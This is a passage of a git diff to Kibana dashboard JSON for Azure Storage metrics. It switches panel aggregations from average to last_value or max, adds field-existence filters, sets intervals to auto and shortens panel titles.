- "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.queue_capacity.avg" @@ -160,7 +166,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.queue_capacity.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.queue_capacity.avg))", "operationType": "overall_max", "references": [ "9c38f7a6-3d0e-42ea-818e-c7b3503cac99X0" 
@@ -196,7 +202,7 @@ "metricAccessor": "487171cd-7adb-4fe6-ac1b-af81610bb835" } }, - "title": "Storage Queue Capacity [Azure Metrics] (converted)", + "title": "Storage Queue Capacity", "type": "lens", "visualizationType": "lnsMetric" }, @@ -211,7 +217,7 @@ "y": 5 }, "panelIndex": "0b4107a7-6a3d-4092-9813-00edb56bc838", - "title": "Storage Queue Capacity [Azure Metrics]", + "title": "Storage Queue Capacity", "type": "lens", "version": "8.7.0" }, @@ -247,10 +253,10 @@ "4a919315-6965-4448-b506-d4e41d5e4da2": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.queue_message_count.avg))", + "label": "overall_max(last_value(azure.storage_account.queue_message_count.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.queue_message_count.avg))", + "formula": "overall_max(last_value(azure.storage_account.queue_message_count.avg))", "isFormulaBroken": false }, "references": [ @@ -261,11 +267,15 @@ "4a919315-6965-4448-b506-d4e41d5e4da2X0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.queue_message_count.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.queue_message_count.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.queue_message_count.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.queue_message_count.avg" @@ -274,7 +284,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.queue_message_count.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.queue_message_count.avg))", "operationType": "overall_max", "references": [ "4a919315-6965-4448-b506-d4e41d5e4da2X0" 
@@ -290,12 +300,12 @@ }, "isBucketed": false, "label": "Queue Message Count", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.queue_message_count.avg" @@ -329,7 +339,7 @@ "metricAccessor": "72960318-f3b9-47a4-bce5-c75234290760" } }, - "title": "Storage Queue Message Count [Azure Metrics] (converted)", + "title": "Storage Queue Message Count", "type": "lens", "visualizationType": "lnsMetric" }, @@ -344,7 +354,7 @@ "y": 5 }, "panelIndex": "cf022a47-2314-4ab6-b397-b1d860944179", - "title": "Storage Queue Message Count [Azure Metrics]", + "title": "Storage Queue Message Count", "type": "lens", "version": "8.7.0" }, @@ -380,10 +390,10 @@ "59f2bee0-1a09-4b55-8016-14ee3cd01079": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.queue_count.avg))", + "label": "overall_max(last_value(azure.storage_account.queue_count.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.queue_count.avg))", + "formula": "overall_max(last_value(azure.storage_account.queue_count.avg))", "isFormulaBroken": false }, "references": [ @@ -394,11 +404,15 @@ "59f2bee0-1a09-4b55-8016-14ee3cd01079X0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.queue_count.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.queue_count.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.queue_count.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.queue_count.avg" 
@@ -407,7 +421,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.queue_count.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.queue_count.avg))", "operationType": "overall_max", "references": [ "59f2bee0-1a09-4b55-8016-14ee3cd01079X0" @@ -423,12 +437,12 @@ }, "isBucketed": false, "label": "Queue Count", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.queue_count.avg" @@ -462,7 +476,7 @@ "metricAccessor": "f9be0a93-f211-4823-9f9a-c5162cde988e" } }, - "title": "Storage Queue Count [Azure Metrics] (converted)", + "title": "Storage Queue Count", "type": "lens", "visualizationType": "lnsMetric" }, @@ -477,7 +491,7 @@ "y": 5 }, "panelIndex": "9d84188c-5a30-41ac-81cc-fe4fed360dd3", - "title": "Storage Queue Count [Azure Metrics]", + "title": "Storage Queue Count", "type": "lens", "version": "8.7.0" }, @@ -516,7 +530,7 @@ "params": { "dropPartials": false, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -524,18 +538,22 @@ "d9e64a9b-a0e7-4f70-932d-50c276e132ed": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.availability.avg: *" + }, "isBucketed": false, "label": "Availability", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " %" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.availability.avg" @@ -626,7 +644,7 @@ "yRightScale": "linear" } }, - "title": "Storage Availability [Azure Metrics] (converted)", + "title": "Storage Availability", "type": "lens", "visualizationType": "lnsXY" }, 
@@ -719,7 +737,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -811,7 +829,7 @@ "yRightScale": "linear" } }, - "title": "Storage Transactions [Azure Metrics] (converted)", + "title": "Storage Transactions", "type": "lens", "visualizationType": "lnsXY" }, @@ -861,18 +879,22 @@ "27084753-0d21-44c4-9cc8-bb1718d840ed": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_server_latency.avg: *" + }, "isBucketed": false, "label": "SuccessServerLatency (ms)", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " ms" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.success_server_latency.avg" @@ -885,7 +907,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1003,7 +1025,7 @@ "yRightScale": "linear" } }, - "title": "Storage Success Server Latency [Azure Metrics] (converted)", + "title": "Storage Success Server Latency", "type": "lens", "visualizationType": "lnsXY" }, @@ -1053,18 +1075,22 @@ "0629be0e-c959-4df4-89b2-cd98578d8eff": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_e2elatency.avg: *" + }, "isBucketed": false, "label": "Success E2E Latency (ms)", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " ms" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.success_e2elatency.avg" 
@@ -1077,7 +1103,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1195,7 +1221,7 @@ "yRightScale": "linear" } }, - "title": "Storage Success E2E Latency [Azure Metrics] (converted)", + "title": "Storage Success E2E Latency", "type": "lens", "visualizationType": "lnsXY" }, @@ -1276,7 +1302,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1390,7 +1416,7 @@ "yRightScale": "linear" } }, - "title": "Storage Account Egress Traffic [Azure Metrics] (converted)", + "title": "Storage Account Egress Traffic", "type": "lens", "visualizationType": "lnsXY" }, @@ -1445,7 +1471,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1585,7 +1611,7 @@ "yRightScale": "linear" } }, - "title": "Storage Account Ingress Traffic [Azure Metrics] (converted)", + "title": "Storage Account Ingress Traffic", "type": "lens", "visualizationType": "lnsXY" }, @@ -1610,7 +1636,7 @@ "version": 1 }, "coreMigrationVersion": "8.7.0", - "created_at": "2023-09-01T11:34:52.555Z", + "created_at": "2024-03-29T10:13:12.366Z", "id": "azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc", "migrationVersion": { "dashboard": "8.7.0" diff --git a/packages/azure_metrics/kibana/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc.json b/packages/azure_metrics/kibana/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc.json index 0f5c44c65cc..e132f81b216 100644 --- a/packages/azure_metrics/kibana/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc.json +++ b/packages/azure_metrics/kibana/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc.json 
@@ -27,6 +27,7 @@ { "embeddableConfig": { "enhancements": {}, + "hidePanelTitles": false, "savedVis": { "data": { "aggs": [], @@ -44,7 +45,7 @@ "markdown": "### Azure Storage\n\n[**Overview**](#/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc) | [Blob](#/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc) | [File](#/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc) | [Table](#/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc) | [Queue](#/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc) ", "openLinksInNewTab": false }, - "title": "Navigation Storage Overview [Azure Metrics]", + "title": "Navigation Storage Overview", "type": "markdown", "uiState": {} } @@ -57,6 +58,7 @@ "y": 0 }, "panelIndex": "3e05fed8-0edd-4973-a640-3499c62b141d", + "title": "Navigation Storage Overview", "type": "visualization", "version": "8.7.0" }, @@ -98,12 +100,12 @@ }, "isBucketed": false, "label": "Used Capacity", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "bytes" - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.used_capacity.avg" @@ -111,10 +113,10 @@ "a2063525-bfe8-4af3-a408-3b35113a1481": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.used_capacity.avg))", + "label": "overall_max(last_value(azure.storage_account.used_capacity.avg))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.used_capacity.avg))", + "formula": "overall_max(last_value(azure.storage_account.used_capacity.avg))", "isFormulaBroken": false }, "references": [ 
@@ -125,11 +127,15 @@ "a2063525-bfe8-4af3-a408-3b35113a1481X0": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.used_capacity.avg: *" + }, "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.used_capacity.avg))", - "operationType": "average", + "label": "Part of overall_max(last_value(azure.storage_account.used_capacity.avg))", + "operationType": "last_value", "params": { - "emptyAsNull": false + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.used_capacity.avg" @@ -138,7 +144,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.used_capacity.avg))", + "label": "Part of overall_max(last_value(azure.storage_account.used_capacity.avg))", "operationType": "overall_max", "references": [ "a2063525-bfe8-4af3-a408-3b35113a1481X0" @@ -175,7 +181,7 @@ "showBar": false } }, - "title": "Storage Used Capacity [Azure Metrics] (converted)", + "title": "Storage Used Capacity", "type": "lens", "visualizationType": "lnsMetric" }, @@ -190,7 +196,7 @@ "y": 5 }, "panelIndex": "ed66fab5-f4e7-45d9-b27f-2315e0a10850", - "title": "Storage Used Capacity [Azure Metrics]", + "title": "Storage Used Capacity", "type": "lens", "version": "8.7.0" }, @@ -226,10 +232,10 @@ "6160382c-270e-42f7-9d4a-f644e4af73a1": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.ingress.total))", + "label": "overall_max(max(azure.storage_account.ingress.total))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.ingress.total))", + "formula": "overall_max(max(azure.storage_account.ingress.total))", "isFormulaBroken": false }, "references": [ 
@@ -241,8 +247,8 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.ingress.total))", - "operationType": "average", + "label": "Part of overall_max(max(azure.storage_account.ingress.total))", + "operationType": "max", "params": { "emptyAsNull": false }, @@ -253,7 +259,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.ingress.total))", + "label": "Part of overall_max(max(azure.storage_account.ingress.total))", "operationType": "overall_max", "references": [ "6160382c-270e-42f7-9d4a-f644e4af73a1X0" @@ -269,7 +275,7 @@ }, "isBucketed": false, "label": "Ingress", - "operationType": "average", + "operationType": "max", "params": { "emptyAsNull": true, "format": { @@ -309,7 +315,7 @@ "showBar": false } }, - "title": "Storage Ingress Gauge [Azure Metrics] (converted)", + "title": "Storage Ingress Gauge", "type": "lens", "visualizationType": "lnsMetric" }, @@ -324,7 +330,7 @@ "y": 5 }, "panelIndex": "71f11ae2-b13c-49b5-ae16-3d6d5e1dacec", - "title": "Storage Ingress Gauge [Azure Metrics]", + "title": "Storage Ingress Gauge", "type": "lens", "version": "8.7.0" }, @@ -366,7 +372,7 @@ }, "isBucketed": false, "label": "Egress", - "operationType": "average", + "operationType": "max", "params": { "emptyAsNull": true, "format": { @@ -379,10 +385,10 @@ "e5b9cf0f-995d-4164-b70b-c3c7d3a28422": { "dataType": "number", "isBucketed": false, - "label": "overall_max(average(azure.storage_account.egress.total))", + "label": "overall_max(max(azure.storage_account.egress.total))", "operationType": "formula", "params": { - "formula": "overall_max(average(azure.storage_account.egress.total))", + "formula": "overall_max(max(azure.storage_account.egress.total))", "isFormulaBroken": false }, "references": [ 
@@ -394,8 +400,8 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.egress.total))", - "operationType": "average", + "label": "Part of overall_max(max(azure.storage_account.egress.total))", + "operationType": "max", "params": { "emptyAsNull": false }, @@ -406,7 +412,7 @@ "customLabel": true, "dataType": "number", "isBucketed": false, - "label": "Part of overall_max(average(azure.storage_account.egress.total))", + "label": "Part of overall_max(max(azure.storage_account.egress.total))", "operationType": "overall_max", "references": [ "e5b9cf0f-995d-4164-b70b-c3c7d3a28422X0" @@ -442,7 +448,7 @@ "metricAccessor": "18860bc9-c1b5-47ca-8377-355028ce4e63" } }, - "title": "Storage Egress Gauge [Azure Metrics] (converted)", + "title": "Storage Egress Gauge", "type": "lens", "visualizationType": "lnsMetric" }, @@ -457,7 +463,7 @@ "y": 5 }, "panelIndex": "dae9895e-c53a-4989-bab1-1b7b7c233c56", - "title": "Storage Egress Gauge [Azure Metrics]", + "title": "Storage Egress Gauge", "type": "lens", "version": "8.7.0" }, @@ -491,18 +497,22 @@ "0f3a1d5f-a240-422b-aa08-658f47ba2ac6": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.availability.avg: *" + }, "isBucketed": false, "label": "Availability", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": "%" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.availability.avg" @@ -515,7 +525,7 @@ "params": { "dropPartials": false, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -606,7 +616,7 @@ "yRightScale": "linear" } }, - "title": "Storage Availability [Azure Metrics] (converted)", + "title": "Storage Availability", "type": "lens", "visualizationType": "lnsXY" }, 
@@ -661,7 +671,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -791,7 +801,7 @@ "yRightScale": "linear" } }, - "title": "Storage Transactions [Azure Metrics] (converted)", + "title": "Storage Transactions", "type": "lens", "visualizationType": "lnsXY" }, @@ -846,7 +856,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -854,18 +864,22 @@ "490543d6-dc11-4696-8261-fa41d4897288": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_server_latency.avg: *" + }, "isBucketed": false, "label": "SuccessServerLatency (ms)", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " ms" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.success_server_latency.avg" @@ -983,7 +997,7 @@ "yRightScale": "linear" } }, - "title": "Storage Success Server Latency [Azure Metrics] (converted)", + "title": "Storage Success Server Latency", "type": "lens", "visualizationType": "lnsXY" }, @@ -1033,18 +1047,22 @@ "70e1d63a-137c-4d51-b195-0dce32c673a8": { "customLabel": true, "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.success_e2elatency.avg: *" + }, "isBucketed": false, "label": "Success E2E Latency (ms)", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "number", "params": { "decimals": 1, "suffix": " ms" } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.success_e2elatency.avg" 
@@ -1083,7 +1101,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1175,7 +1193,7 @@ "yRightScale": "linear" } }, - "title": "Storage Success E2E Latency [Azure Metrics] (converted)", + "title": "Storage Success E2E Latency", "type": "lens", "visualizationType": "lnsXY" }, @@ -1230,15 +1248,15 @@ }, "isBucketed": false, "label": "Used Capacity", - "operationType": "average", + "operationType": "last_value", "params": { - "emptyAsNull": true, "format": { "id": "bytes", "params": { "decimals": 1 } - } + }, + "sortField": "@timestamp" }, "scale": "ratio", "sourceField": "azure.storage_account.used_capacity.avg" @@ -1346,7 +1364,7 @@ "valueLabels": "show" } }, - "title": "Storage Used Capacity Resource Table [Azure Metrics] (converted)", + "title": "Storage Used Capacity Resource Table", "type": "lens", "visualizationType": "lnsXY" }, @@ -1401,7 +1419,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1541,7 +1559,7 @@ "yRightScale": "linear" } }, - "title": "Storage Account Egress Traffic [Azure Metrics] (converted)", + "title": "Storage Account Egress Traffic", "type": "lens", "visualizationType": "lnsXY" }, @@ -1618,7 +1636,7 @@ "params": { "dropPartials": true, "includeEmptyRows": true, - "interval": "5m" + "interval": "auto" }, "scale": "interval", "sourceField": "@timestamp" @@ -1736,7 +1754,7 @@ "yRightScale": "linear" } }, - "title": "Storage Account Ingress Traffic [Azure Metrics] (converted)", + "title": "Storage Account Ingress Traffic", "type": "lens", "visualizationType": "lnsXY" }, @@ -1761,7 +1779,7 @@ "version": 1 }, "coreMigrationVersion": "8.7.0", - "created_at": "2023-09-01T05:30:06.264Z", + "created_at": "2024-03-29T10:14:24.713Z", "id": "azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc", "migrationVersion": { "dashboard": "8.7.0" 
diff --git a/packages/azure_metrics/kibana/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc.json b/packages/azure_metrics/kibana/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc.json index b99db13decf..9176e1c920b 100644 --- a/packages/azure_metrics/kibana/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc.json +++ b/packages/azure_metrics/kibana/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc.json @@ -1,14 +1,12 @@ { - "id": "azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc", - "type": "dashboard", - "namespaces": [ - "default" - ], - "updated_at": "2023-08-08T06:46:29.879Z", - "version": "WzgzMywxXQ==", "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"7eb82f60-7b2e-473f-960b-35b3fa5392d5\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"7eb82f60-7b2e-473f-960b-35b3fa5392d5\",\"fieldName\":\"azure.subscription_id\",\"title\":\"Subscription\",\"singleSelect\":true,\"enhancements\":{}}},\"269e473e-2b24-402e-9721-3c9b3bd85458\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"269e473e-2b24-402e-9721-3c9b3bd85458\",\"fieldName\":\"azure.resource.group\",\"title\":\"Resource Group\",\"enhancements\":{}}},\"192cb16e-8bf4-4e63-b95c-338b8fc0fcfa\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"192cb16e-8bf4-4e63-b95c-338b8fc0fcfa\",\"fieldName\":\"azure.resource.name\",\"title\":\"Resource Name\",\"singleSelect\":false,\"enhancements\":{}}}}" + }, "description": "This dashboard shows metrics for the blob storage type in Azure.", - "hits": 0, "kibanaSavedObjectMeta": { "searchSourceJSON": { "filter": [ 
@@ -42,32 +40,17 @@ }, "optionsJSON": { "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, "useMargins": true }, "panelsJSON": [ { - "version": "8.3.0", - "type": "visualization", - "gridData": { - "h": 5, - "i": "ed5f5642-c94a-481b-a8c2-7dfe4c6a4f05", - "w": 9, - "x": 0, - "y": 0 - }, - "panelIndex": "ed5f5642-c94a-481b-a8c2-7dfe4c6a4f05", "embeddableConfig": { "enhancements": {}, + "hidePanelTitles": false, "savedVis": { - "title": "Navigation Blob Storage Overview [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "fontSize": 10, - "markdown": "### Azure Storage\n\n[Overview](#/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc) | [**Blob**](#/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc) | [File](#/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc) | [Table](#/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc) | [Queue](#/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc) ", - "openLinksInNewTab": false - }, - "type": "markdown", "data": { "aggs": [], "searchSource": { 
@@ -77,937 +60,1580 @@ "query": "" } } - } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "### Azure Storage\n\n[Overview](#/dashboard/azure_metrics-1a151f80-32db-11ea-a83e-25b8612d00cc) | [**Blob**](#/dashboard/azure_metrics-b165ef60-32f7-11ea-a83e-25b8612d00cc) | [File](#/dashboard/azure_metrics-dff7a080-32f7-11ea-a83e-25b8612d00cc) | [Table](#/dashboard/azure_metrics-ff2fe020-32f7-11ea-a83e-25b8612d00cc) | [Queue](#/dashboard/azure_metrics-10efa340-32f8-11ea-a83e-25b8612d00cc) ", + "openLinksInNewTab": false + }, + "title": "Navigation Blob Storage Overview", + "type": "markdown", + "uiState": {} } - } - }, - { - "version": "8.3.0", - "type": "visualization", + }, "gridData": { - "h": 9, - "i": "a9456b9b-efa6-410d-a56c-4b66aa8c499e", - "w": 5, - "x": 9, + "h": 5, + "i": "ed5f5642-c94a-481b-a8c2-7dfe4c6a4f05", + "w": 48, + "x": 0, "y": 0 }, - "panelIndex": "a9456b9b-efa6-410d-a56c-4b66aa8c499e", + "panelIndex": "ed5f5642-c94a-481b-a8c2-7dfe4c6a4f05", + "title": "Navigation Blob Storage Overview", + "type": "visualization", + "version": "8.7.0" + }, + { "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "title": "Storage Availability [Azure Metrics]", - "description": "", - "uiState": {}, - "params": { - "axis_formatter": "number", - "axis_min": 0, - "axis_position": "left", - "axis_scale": "normal", - "background_color_rules": [ - { - "background_color": "rgba(104,204,202,1)", - "id": "18f616c0-32e2-11ea-867b-37070aefa392", - "operator": "gte", - "value": 100 + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "tsvb_ad_hoc_metrics-*/@timestamp": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "metrics-*", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*" + } + }, + "datasourceStates": { + "formBased": { + "layers": { + "eaeec0a4-4154-40ae-b023-88b8b8cd9a15": { + "columnOrder": [ 
+ "6ab423e8-6223-4f5a-9332-5ac7b8aa7d1e", + "03f75b15-78c2-4392-bf4c-9cec8e77d105", + "03f75b15-78c2-4392-bf4c-9cec8e77d105X0", + "03f75b15-78c2-4392-bf4c-9cec8e77d105X1" + ], + "columns": { + "03f75b15-78c2-4392-bf4c-9cec8e77d105": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(azure.storage_account.blob_capacity.avg))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(azure.storage_account.blob_capacity.avg))", + "isFormulaBroken": false + }, + "references": [ + "03f75b15-78c2-4392-bf4c-9cec8e77d105X1" + ], + "scale": "ratio" + }, + "03f75b15-78c2-4392-bf4c-9cec8e77d105X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "azure.storage_account.blob_capacity.avg: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(azure.storage_account.blob_capacity.avg))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.blob_capacity.avg" + }, + "03f75b15-78c2-4392-bf4c-9cec8e77d105X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(azure.storage_account.blob_capacity.avg))", + "operationType": "overall_max", + "references": [ + "03f75b15-78c2-4392-bf4c-9cec8e77d105X0" + ], + "scale": "ratio" + }, + "6ab423e8-6223-4f5a-9332-5ac7b8aa7d1e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Blob Capacity", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes" + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "azure.storage_account.blob_capacity.avg" + } + }, + "incompleteColumns": {} + } + } }, - { - "background_color": "rgba(244,78,59,1)", - "id": "998b1c90-32e2-11ea-867b-37070aefa392", - "operator": "lt", - "value": 100 + "textBased": { + "layers": {} 
} - ], - "bar_color_rules": [ + }, + "filters": [], + "internalReferences": [ { - "id": "28142cf0-32e2-11ea-867b-37070aefa392" + "id": "tsvb_ad_hoc_metrics-*/@timestamp", + "name": "indexpattern-datasource-layer-eaeec0a4-4154-40ae-b023-88b8b8cd9a15", + "type": "index-pattern" } ], - "drop_last_bucket": 0, - "filter": { + "query": { "language": "kuery", "query": "" }, - "gauge_color_rules": [ - { - "id": "29808e30-32e2-11ea-867b-37070aefa392" - } - ], - "gauge_inner_width": "7", - "gauge_style": "circle", - "gauge_width": 10, - "id": "0e91b810-32e2-11ea-a93d-dd20c62559b3", - "index_pattern": "metrics-*", - "interval": "5m", - "isModelInvalid": false, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "rgba(22,165,165,1)", - "fill": "0.6", - "formatter": "number", - "hide_in_legend": 1, - "id": "0e91b811-32e2-11ea-a93d-dd20c62559b3", - "label": "Availability", - "line_width": 2, - "metrics": [ - { - "field": "azure.storage_account.availability.avg", - "id": "0e91b812-32e2-11ea-a93d-dd20c62559b3", - "type": "avg" - } - ], - "point_size": 0, - "separate_axis": 0, - "split_color_mode": "gradient", - "split_mode": "everything", - "stacked": "none", - "terms_field": null, - "type": "timeseries", - "value_template": "{{value}} %" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "@timestamp", - "time_range_mode": "last_value", - "type": "timeseries", - "use_kibana_indexes": false + "visualization": { + "color": "#009CE0", + "layerId": "eaeec0a4-4154-40ae-b023-88b8b8cd9a15", + "layerType": "data", + "maxAccessor": "03f75b15-78c2-4392-bf4c-9cec8e77d105", + "metricAccessor": "6ab423e8-6223-4f5a-9332-5ac7b8aa7d1e" + } }, - "type": "metrics", - "data": { - "aggs": [], - "searchSource": {} - } - } + "title": "Storage Blob Capacity", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": false }, - "title": "Availability" - }, - { - "version": "8.3.0", - "type": "visualization", "gridData": { 
